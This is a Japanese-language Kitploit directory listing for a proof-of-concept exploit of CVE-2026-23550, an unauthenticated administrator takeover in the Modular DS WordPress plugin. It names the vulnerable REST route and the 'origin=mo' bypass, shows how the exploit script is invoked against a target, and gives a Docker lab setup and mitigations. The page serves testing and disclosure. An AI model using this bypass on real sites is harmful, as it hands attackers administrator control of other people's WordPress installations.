Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23550-PoC — CVE-2026-23550 - Modular DS WordPress プラグイン **未認証の管理者アクセス** | Kitploit
ツール/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPress プラグイン **未認証の管理者アクセス**

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPressプラグイン 認証なし管理者アクセス

Status CVSS Affected

概念実証(PoC) - CVE-2026-23550 を実証します。これは Modular DS WordPressプラグイン(バージョン≤2.5.1)における重大な認証なし管理者アカウント乗っ取りです。実環境で活発に悪用されています。

PoCフロー

攻撃概要: /api/modular-connector/login の欠陥のあるREST APIルーティングが、origin=mo のときにWordPress認証をバイパスし、認証なしの管理者セッションCookieを発行します。

🚀 クイックデモ - WPがすでにセットアップ済みの場合

root@kitploit:~
# 本番対応PoC
./CVE-2026-23550-PoC.sh http://target.com

出力:

root@kitploit:~
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Admin session cookie issued

技術メモ:

影響を受けるRESTエンドポイントは ?rest_route= メカニズム経由でのみアクセス可能です。/wp-json/ 経由の直接アクセスは利用できない場合があります。この脆弱性により、認証情報やnonce検証なしで認証なしアクセスが可能になります。WordPress管理者セッションCookieの発行に成功した場合、悪用の確認となります。この概念実証は管理操作を一切実行しません。テストにはModular DSバージョン2.5.0を使用しています。


⚙️ 再現手順:

ステップ1: ラボ用ディレクトリ

root@kitploit:~
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

ステップ2: Docker Compose

root@kitploit:~
version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

ステップ3: デプロイ

root@kitploit:~
docker compose up -d
docker compose logs -f db

「ready for connections」を待つ

ステップ4: WordPressインストール

  • URL: http://localhost:8080
  • 管理者ユーザー: admin
  • パスワード: admin123
  • サイトタイトル: 任意

ステップ5: RESTの確認(重要)

root@kitploit:~
curl http://localhost:8080/?rest_route=/

期待される出力:

root@kitploit:~
{
  "name": "...",
  "namespaces": [...]
}

これが失敗した場合 → 停止、環境が壊れています。

ステップ6: 脆弱なプラグインのインストール

root@kitploit:~
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

ステップ7: プラグインの有効化

  • http://localhost:8080/wp-admin/plugins.php
  • Modular Connector を有効化
  • オンボーディングのプロンプトは無視

ステップ8: 悪用

root@kitploit:~
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

注: Cookieをテキストファイルに保存したい場合は、poc.shファイルから「rm -f "$COOKIE_JAR"」を削除してください。

🛡️ 緩和策

  • 即時対応: Modular DSプラグインを無効化
  • パッチ: 2.5.2以降にアップグレード
  • 監査: 不正な管理者ユーザーの確認
  • WAF: ?rest_route=/api/modular-connector/login をブロック

📄 ライセンス

MITライセンス - セキュリティ研究および許可されたペネトレーションテスト専用です。 悪意のある使用は禁止です。責任を持って開示してください。

🚨 法的通知

このPoCは許可されたセキュリティテスト専用です。本番システムに対する不正使用は違法です。発見事項はプラグイン保守担当者に報告してください。

ツールをダウンロード